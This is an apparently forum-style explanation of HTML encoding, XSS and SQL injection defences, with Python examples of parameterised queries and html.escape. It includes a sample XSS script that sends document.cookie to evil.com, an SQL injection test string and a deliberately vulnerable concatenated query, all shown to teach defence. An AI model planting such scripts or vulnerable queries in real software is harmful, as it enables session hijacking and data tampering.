HTML/AJAX Encoding & Security

Question 1

I'll answer your points in a different order than asked, as I think it will make more sense this way.

Upon receiving data from the client, the middle-tier should scrub it of obvious depravities (could anyone elaborate as to what this is? Or is this purely context-dependent?) a

Yes, it is purely context-dependent.

In a nutshell, you should encode only at the point of output (either to the page or to another component where the language or protocol changes). When dealing with values in memory you should be working with the raw, unencoded values.

The middle-tier receives data from the back-end, and... this is where I start getting confused (assuming that I'm even correct at earlier points in this). I believe that the general consensus is to assume the data is corrupt and terrible, so you... encode it again? But if it's already encoded, that leaves you with double-encoded data, which is just confusing.

When you retrieve data from the back-end, you will usually get it in unencoded form (any decoding is usually done for you automatically, though this can depend on the back-end). This means you are not double-encoding it when you later encode it for output.
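To make the double-encoding worry concrete, here is a minimal sketch in Python (my choice of language, the question doesn't name one) using the standard library's html.escape. The sample string is made up for illustration.

```python
import html

# Raw value, as held in memory or returned by the database.
raw = "Tom & Jerry <3"

# Correct: encode once, at the moment the value is written into HTML.
encoded_once = html.escape(raw)

# Wrong: encoding text that is already encoded.
encoded_twice = html.escape(encoded_once)

print(encoded_once)   # Tom &amp; Jerry &lt;3
print(encoded_twice)  # Tom &amp;amp; Jerry &amp;lt;3

# A browser decodes exactly one level, so only the single-encoded
# version is displayed as the original text.
assert html.unescape(encoded_once) == raw
assert html.unescape(encoded_twice) != raw
```

If the stored value is always the raw one, the only encoding step is the one at output, and the second case cannot arise.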

On the client side, should anything be done?

If you are manipulating DOM objects using JavaScript then you still have to take care that nothing external to your page can alter the execution of your scripts to create an exploit. For example, make sure anything written straight into HTML is correctly encoded. If you're setting attributes where JavaScript can be inserted, such as onclick, you may need to validate and reject dangerous data before it is output (or, if you know beforehand that this is where the data will end up, you can validate it at the UI, where the user can try again).

This is because any JavaScript that runs on your website should be trusted not to do bad things, and allowing your script, albeit client-side, to be manipulated can lead to vulnerabilities. Bad things that can happen include sending your cookies to the attacker's domain so they can use the session ID to hijack sessions:

<script>document.location.href = 'http://www.evil.com?' + escape(document.cookie);</script>

This exploit is called DOM-based XSS, and you touched upon it when mentioning eval.

Encoding Example

A user enters some text into a text box and submits it to your web server, which you will later output.

When the middle tier receives it, it does not need to encode anything, as data can only be "corrupt and terrible" when put into context.

The middle tier would then ask the back-end database to write it as a record. Following best practices, it should do this using a parameterised query, which makes sure the values are strongly typed and that the query cannot be broken out of to cause SQL injection.

Pseudo code example:

command.query = "insert into mytable (mytext) values (?);";
command.parameters.add(inputText);

command.execute();
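
For something you can actually run, here is a rough equivalent of the pseudo code using Python's built-in sqlite3 module. The in-memory database and the hostile sample input are my own assumptions for illustration; the table and column names follow the pseudo code.

```python
import sqlite3

# Throwaway in-memory database, used here purely for demonstration.
conn = sqlite3.connect(":memory:")
conn.execute("create table mytable (mytext text)")

# Hostile-looking input that tries to break out of a quoted string.
input_text = "x'); drop table mytable; --"

# The ? placeholder keeps the value separate from the SQL text,
# so it is always treated as data and never as part of the command.
conn.execute("insert into mytable (mytext) values (?)", (input_text,))

# The value comes back exactly as it went in, unencoded.
stored = conn.execute("select mytext from mytable").fetchone()[0]
print(stored == input_text)  # True
```

Other database drivers use a different placeholder style (named parameters, %s and so on), but the idea is the same.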

Now let us imagine we are using a database that doesn't have parameter support. Now our query would have to be as follows.

command.query = "insert into mytable (mytext) values ('" + inputText + "');";

However, this is vulnerable to SQL injection as a user can manipulate inputText to contain a single quote and change the context of inputText into another SQL command instead of just a value.

See here for a more thorough example: https://www.owasp.org/index.php/SQL_Injection

So to secure our free-text query we would have to correctly encode the inputText string for the context of our SQL server. Suppose we have a method named SqlEncode that will correctly convert the quote characters into their correct value (usually doubling quotes so ' becomes '').

So now our secure query is:

command.query = "insert into mytable (mytext) values ('" + SqlEncode(inputText) + "');";

So if someone entered O'leary as their word, the statement below would be executed.

insert into mytable (mytext) values ('O''leary');

Which our DB server would interpret as the value O'leary being inserted.
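
As a sketch only, this is what a SqlEncode along those lines could look like in Python. The function name sql_encode is hypothetical, and it only applies the quote-doubling rule of standard SQL string literals. I'm using SQLite to show the round trip because it follows that rule; other servers may have further escape characters (for example a backslash), so this should not be taken as a complete encoder, and parameters remain preferable wherever they exist.

```python
import sqlite3


def sql_encode(value: str) -> str:
    """Hypothetical helper: double single quotes so the value
    stays inside a standard SQL string literal."""
    return value.replace("'", "''")


conn = sqlite3.connect(":memory:")
conn.execute("create table mytable (mytext text)")

input_text = "O'leary"

# Free-text query, built by concatenation as in the example above.
query = "insert into mytable (mytext) values ('" + sql_encode(input_text) + "');"
print(query)  # insert into mytable (mytext) values ('O''leary');

conn.execute(query)

# The database stores and returns the raw value, with a single quote.
stored = conn.execute("select mytext from mytable").fetchone()[0]
print(stored)  # O'leary
```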

Now when we retrieve this value from the DB into our middle tier using a standard select, the raw value O'leary is retrieved and stored in memory. Note that this is the unencoded version. If we were then to output it to a webpage, we should HTML encode it to ensure all special HTML characters are transformed into their proper HTML representation. For example, if our HTML encoding method encoded all non-alphanumeric characters (which is valid, if a little overkill), our output from the above would be O&#39;leary. Encoding the single quote is not essential in HTML element content (though it is inside a single-quoted attribute value, and in JavaScript!), but other HTML characters such as less than and greater than should definitely be encoded. For more details on HTML encoding, see here. It is often best to use encoding functions that already exist in your language rather than rolling your own, as it is easy to overlook things that could lead to an exploit.
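
As an example of an existing encoding function, Python's standard library has html.escape. A minimal sketch follows; note that it writes the single quote as the hexadecimal reference &#x27;, which browsers treat the same as the decimal form. The second value reuses the cookie-stealing script from earlier as the hostile input.

```python
import html

# Raw value as retrieved from the database.
stored = "O'leary"
print(html.escape(stored))  # O&#x27;leary

# Hostile value: once encoded it contains no angle brackets,
# so the browser shows it as text instead of running it.
payload = ("<script>document.location.href = 'http://www.evil.com?' "
           "+ escape(document.cookie);</script>")
safe = html.escape(payload)
print(safe)

# Encoding is reversible, so nothing is lost by storing the raw value
# and encoding only at output.
assert html.unescape(safe) == payload
```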

Question 2

I think you mean escaping, not encoding.

If you're using parameterized queries, you don't have to worry too much about escaping input from the user because the escaping will be done for you.

When reading data stored in the database (that was entered by the user), escape it so that users can't insert any HTML that they wish on a page. You should be the one to create all HTML tags, and fill in the escaped data from the database.
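
A small sketch of that split in Python, with the markup fixed by the application and only escaped values filled in. The template, the render_comments function and the sample rows are all hypothetical.

```python
import html
from string import Template

# The application owns the markup; only the $placeholders vary.
ROW = Template('<li title="$author">$comment</li>')


def render_comments(rows):
    """Build a list from (author, comment) pairs read from the database."""
    items = [
        ROW.substitute(
            # quote=True also escapes quotes, which matters inside attributes.
            author=html.escape(author, quote=True),
            comment=html.escape(comment, quote=True),
        )
        for author, comment in rows
    ]
    return "<ul>" + "".join(items) + "</ul>"


rows = [
    ("Ann", "I <3 this"),
    ('Bob" onmouseover="alert(1)', "<b>bold?</b>"),
]
page = render_comments(rows)
print(page)
```

The second row tries to close the title attribute and to add a tag of its own; after escaping, both attempts end up as visible text.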

From client to web/application server, use SSL/TLS (HTTPS) to prevent sniffing of credentials, sessions, and private information.